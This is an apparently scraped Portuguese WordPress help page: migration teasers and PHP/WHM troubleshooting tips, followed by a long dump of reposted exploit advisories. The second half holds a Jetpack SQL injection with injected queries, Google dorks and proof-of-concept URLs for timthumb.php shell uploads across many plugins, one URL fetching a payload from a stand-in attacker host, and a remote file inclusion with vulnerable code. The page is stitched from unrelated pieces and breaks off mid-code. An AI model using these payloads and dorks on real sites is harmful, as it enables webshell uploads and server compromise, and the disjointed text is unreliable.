Como Migrar seu Site WordPress com o Plugin Duplicator
Créditos: CanalWP
Se deseja mudar o domínio ou está interessado em fazer um backup e instalar em um servidor local do WordPress, será necessário fazer a troca de endereço do blog.
Além da cópia de todos os arquivos, será necessário atualizar algumas informações no banco de dados para fazer a troca de domínios. Para isso a maneira mais rápida é através da edição do banco de dados, veja a seguir o passo a passo de como fazê-lo de maneira prática, rápida e totalmente segura. (mais…)
Mesmo que você não seja um entendido no assunto, provavelmente já ouviu falar do WordPress. A plataforma é hoje a mais popular do mundo para a construção e desenvolvimento de websites, desde blogs ou sites corporativos até complexos sistemas e lojas virtuais.
Bem, antes de tudo, é preciso diferenciar o WordPress.com, que é uma plataforma online na qual você pode montar, gratuitamente, seu blog (como o Blogger ou o Tumblr), do WordPress.org. Nesse segundo website, é possível fazer o download de um arquivo ZIP que contém a instalação do sistema WordPress – é sobre ele que o seu site é construído.
O webmaster instala esse pacote do WordPress.org em seu serviço de webhost e, a partir dele, poderá criar um banco de dados para seu website e começar a montá-lo, inserindo ou modificando funcionalidades e alterando o chamado tema, que é a “cara” que o seu website vai ter. (mais…)
Passos para Sanar o Problema:
1 – Entre no WHM como root,
2 – Siga os menus e submenus (->) Home (Início) -> Service Configuration -> PHP Configuration Editor,
3 – Localize o item Memory_Limit, esse deve possuir PELO MENOS 320mb (sim, há plugins pesados que consomem muita ram),
4 – Localize Upload_max_filesize, apesar de não influenciar aqui, no momento de uploads você pode se dar mal, deixe pelo menos 500MB (nossa hospedagem permite 2gb de upload),
5 – Localize Max_execution_time, deixe pelo menos 600s (para uploads longos ou processos de plugins será de suma importância ter execução longa),
6 – Localize Max_input_time e deixe pelo menos 300s.
De todos os pontos que citamos, os 2 principais para sanar o problema são MEMORY_LIMIT e Max_Execution_Time.
Fonte: http://webking.com.br/blog/wordpress-dando-pagina-branca-blank-pages-in-wordpress-cpanel-whm/
Se você está recebendo a mensagem -> Ocorreu um erro inesperado (unexpected error) <— ao tentar fazer QUALQUER coisa remota do wordpress (instalar uma versão, atualizar um plugin, instalar um plugin, ver o Akismet e etc) nem se preocupe, a saída é simples e clara:
1 – Veja se a porta de saída 80 está liberada no seu firewall (bom deixar também a 443 de SSL),
2 – Veja se as pastas do wordpress estão com permissão correta (755 sob suExec ou 777 em DSO sem suExec), assim como arquivos php com permissões corretas -> 644.
3 – Caso os dois pontos acima estejam ok mande o admin do servidor fazer um teste, no arquivo /etc/resolv.conf mande colocar no começo do arquivo:
nameserver 8.8.8.8
nameserver 8.8.4.4
Esses dois nameservers resolvem publicamente usando infra-estrutura “fraquinha da Google”.
Recentemente foi publicada na Icentral uma forma de inibir a frequência de ataques realizados a sites que usam Gestores de Conteúdos (mais conhecidos como CMS). A dica é simples e facilmente compreendida, recomendamos a leitura fortemente. Para acessar o conteúdo clique no link abaixo:
######################################################
# Exploit Title: WordPress jetpack plugin SQL Injection Vulnerability |
# Date: 2011-19-11 |
# Author: longrifle0x |
# software: WordPress |
# Download:http://wordpress.org/extend/plugins/jetpack/ |
# Tools: SQLMAP |
###################################################### |
*DESCRIPTION |
Discovered a vulnerability in jetpack, WordPress Plugin, |
vulnerability is SQL injection. |
File:wp-content/plugins/jetpack/modules/sharedaddy.php |
Exploit: id=-1; or 1=if |
*Exploitation*http://localhost:80/wp-content/plugins/jetpack/modules/sharedaddy.php |
[GET][id=-1][CURRENT_USER()http://localhost:80/wp-content/plugins/jetpack/modules/sharedaddy.php |
[GET][id=-1][SELECT(CASE WHEN ((SELECT super_priv FROMmysql.user WHERE user='None' LIMIT 0,1)='Y') THEN 1 ELSE 0 END) |
http://localhost:80/wp-content/plugins/jetpack/modules/sharedaddy.php |
[GET][id=-1][MID((VERSION()),1,6)
# Exploit Title: Multiple WordPress timthumb.php reuse vulnerabilities
# Date: 09/19/2011
# Author: Ben Schmidt (supernothing (AT) spareclockcycles.org @_supernothing)
---
Description
---
The following WordPress plugins reuse a vulnerable version of the timthumb.php library.
By hosting a malicious GIF file with PHP code appended to the end on an attacker controlled
domain such as blogger.com.evil.com and then providing it to the script through the
src GET parameter, it is possible to upload a shell and execute arbitrary code on the webserver.
Reference: http://www.exploit-db.com/exploits/17602/
# Plugin: Category Grid View Gallery WordPress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/category-grid-view-gallery
# Software Link: http://wordpress.org/extend/plugins/category-grid-view-gallery/download/
# Version: 0.1.1
---
PoC
---
http://SERVER/db_unx_PATH/wp-content/plugins/category-grid-view-gallery/includes/timthumb.php?src=MALICIOUS_URL
The uploaded shell can be found at /wp-content/plugins/category-grid-view-gallery/cache/externel_md5(src).php
# Plugin: Auto Attachments WordPress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/auto-attachments
# Software Link: http://wordpress.org/extend/plugins/auto-attachments/download/
# Version: 0.2.9
---
PoC
---
http://SERVER/db_unx_PATH/wp-content/plugins/auto-attachments/thumb.php?src=MALICIOUS_URL
The uploaded shell can be found at /wp-content/plugins/auto-attachments/cache/external_md5(src).php
# Plugin: WP Marketplace WordPress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/wp-marketplace
# Software Link: http://wordpress.org/extend/plugins/wp-marketplace/download/
# Version: 1.1.0
---
PoC
---
http://SERVER/db_unx_PATH/wp-content/plugins/wp-marketplace/libs/timthumb.php?src=MALICIOUS_URL
The uploaded shell can be found at /wp-content/plugins/wp-marketplace/libs/cache/external_md5(src).php
# Plugin: DP Thumbnail WordPress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/dp-thumbnail
# Software Link: http://wordpress.org/extend/plugins/dp-thumbnail/download/
# Version: 1.0
---
PoC
---
http://SERVER/db_unx_PATH/wp-content/plugins/dp-thumbnail/timthumb/timthumb.php?src=MALICIOUS_URL
The uploaded shell can be found at /wp-content/plugins/dp-thumbnail/timthumb/cache/external_md5(src).php
# Plugin: Vk Gallery WordPress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/vk-gallery
# Software Link: http://wordpress.org/extend/plugins/vk-gallery/download/
# Version: 1.1.0
---
PoC
---
http://SERVER/db_unx_PATH/wp-content/plugins/vk-gallery/lib/timthumb.php?src=MALICIOUS_URL
The uploaded shell can be found at /wp-content/plugins/vk-gallery/lib/cache/md5(src).php
# Plugin: Rekt Slideshow WordPress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/rekt-slideshow
# Software Link: http://wordpress.org/extend/plugins/rekt-slideshow/download/
# Version: 1.0.5
---
PoC
---
http://SERVER/db_unx_PATH/wp-content/plugins/rekt-slideshow/picsize.php?src=MALICIOUS_URL
Must first base64 encode the URL.
The uploaded shell can be found at /wp-content/plugins/rekt-slideshow/cache/md5(src).php
# Plugin: CAC Featured Content WordPress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/cac-featured-content
# Software Link: http://wordpress.org/extend/plugins/cac-featured-content/download/
# Version: 0.8
---
PoC
---
http://SERVER/db_unx_PATH/wp-content/plugins/cac-featured-content/timthumb.php?src=MALICIOUS_URL
The uploaded shell can be found at /wp-content/plugins/cac-featured-content/temp/md5(src).php
# Plugin: Rent A Car WordPress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/rent-a-car
# Software Link: http://wordpress.org/extend/plugins/rent-a-car/download/
# Version: 1.0
---
PoC
---
http://SERVER/db_unx_PATH/wp-content/plugins/rent-a-car/libs/timthumb.php?src=MALICIOUS_URL
The uploaded shell can be found at /wp-content/plugins/rent-a-car/libs/cache/external_md5(src).php
# Plugin: LISL Last Image Slider WordPress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/lisl-last-image-slider
# Software Link: http://wordpress.org/extend/plugins/lisl-last-image-slider/download/
# Version: 1.0
---
PoC
---
http://SERVER/db_unx_PATH/wp-content/plugins/lisl-last-image-slider/timthumb.php?src=MALICIOUS_URL
The uploaded shell can be found at /wp-content/plugins/lisl-last-image-slider/cache/external_md5(src).php
# Plugin: Islidex WordPress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/islidex
# Software Link: http://wordpress.org/extend/plugins/islidex/download/
# Version: 2.7
---
PoC
---
http://SERVER/db_unx_PATH/wp-content/plugins/islidex/js/timthumb.php?src=MALICIOUS_URL
The uploaded shell can be found at /wp-content/plugins/islidex/js/cache/md5(src).php
# Plugin: Kino Gallery WordPress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/kino-gallery
# Software Link: http://wordpress.org/extend/plugins/kino-gallery/download/
# Version: 1.0
---
PoC
---
http://SERVER/db_unx_PATH/wp-content/plugins/kino-gallery/timthumb.php?src=MALICIOUS_URL
The uploaded shell can be found at /wp-content/plugins/kino-gallery/cache/external_md5(src).php
# Plugin: Cms Pack WordPress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/cms-pack
# Software Link: http://wordpress.org/extend/plugins/cms-pack/download/
# Version: 1.3
---
PoC
---
http://SERVER/db_unx_PATH/wp-content/plugins/cms-pack/timthumb.php?src=MALICIOUS_URL
The uploaded shell can be found at /wp-content/uploads/cms-pack-cache/external_md5(src).php
# Plugin: A Gallery WordPress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/a-gallery
# Software Link: http://wordpress.org/extend/plugins/a-gallery/download/
# Version: 0.9
---
PoC
---
http://SERVER/db_unx_PATH/wp-content/plugins/a-gallery/timthumb.php?src=MALICIOUS_URL
The uploaded shell can be found at /wp-content/plugins/a-gallery/cache/external_md5(src).php
# Plugin: Category List Portfolio Page WordPress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/category-list-portfolio-page
# Software Link: http://wordpress.org/extend/plugins/category-list-portfolio-page/download/
# Version: 0.9
---
PoC
---
http://SERVER/db_unx_PATH/wp-content/plugins/category-list-portfolio-page/scripts/timthumb.php?src=MALICIOUS_URL
The uploaded shell can be found at /wp-content/plugins/category-list-portfolio-page/scripts/cache/external_md5(src).php
# Plugin: Really Easy Slider WordPress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/really-easy-slider
# Software Link: http://wordpress.org/extend/plugins/really-easy-slider/download/
# Version: 0.1
---
PoC
---
http://SERVER/db_unx_PATH/wp-content/plugins/really-easy-slider/inc/thumb.php?src=MALICIOUS_URL
The uploaded shell can be found at /wp-content/plugins/really-easy-slider/inc/cache/external_md5(src).php
# Plugin: Verve Meta Boxes WordPress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/verve-meta-boxes
# Date: 09/19/2011
# Author: Ben Schmidt (supernothing (AT) spareclockcycles.org @_supernothing)
# Software Link: http://wordpress.org/extend/plugins/verve-meta-boxes/download/
# Version: 1.2.8
---
PoC
---
http://SERVER/db_unx_PATH/wp-content/plugins/verve-meta-boxes/tools/timthumb.php?src=MALICIOUS_URL
The uploaded shell can be found at /wp-content/plugins/verve-meta-boxes/tools/cache/external_md5(src).php
# Plugin: User Avatar WordPress plugin shell upload vulnerability
# Google Dork: inurl:wp-content/plugins/user-avatar
# Software Link: http://wordpress.org/extend/plugins/user-avatar/download/
# Version: 1.3.7
---
PoC
---
http://SERVER/db_unx_PATH/wp-content/plugins/user-avatar/user-avatar-pic.php?id=0&allowedSites[]=blogger.com&src=http://blogger.com.evil.com/poc.php
Requires register_globals to be enabled and at least one user account to have an avatar directory.
The uploaded shell can be found at /wp-content/uploads/avatars/$id/external_md5(src).php
# Plugin: Extend WordPress WordPress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/extend-wordpress
# Software Link: http://wordpress.org/extend/plugins/extend-wordpress/download/
# Version: 1.3.7
---
PoC
---
http://SERVER/db_unx_PATH/wp-content/plugins/extend-wordpress/helpers/timthumb/image.php?src=MALICIOUS_URL
The uploaded shell can be found at /wp-content/plugins/extend-wordpress/helpers/timthumb/cache/external_md5(src).php
# Exploit Title: Relocate Upload WordPress plugin RFI
# Google Dork: inurl:wp-content/plugins/relocate-upload
# Date: 09/19/2011
# Author: Ben Schmidt (supernothing (AT) spareclockcycles.org @_supernothing)
# Software Link: http://wordpress.org/extend/plugins/relocate-upload/download/
# Version: 0.14 (tested)
---
PoC
---
http://SERVER/db_unx_PATH/wp-content/plugins/relocate-upload/relocate-upload.php?ru_folder=asdf&abspath=RFI
---
Vulnerable Code
---
// Move folder request handled when called by GET AJAX
if (isset($_GET['ru_folder']))
{ // WP setup and function access
define('db_unx_USE_THEMES', false);
require_once(urldecode($_GET['abspath']).'/wp-load.php'); // save us looking for it, it's passed as a GET parameter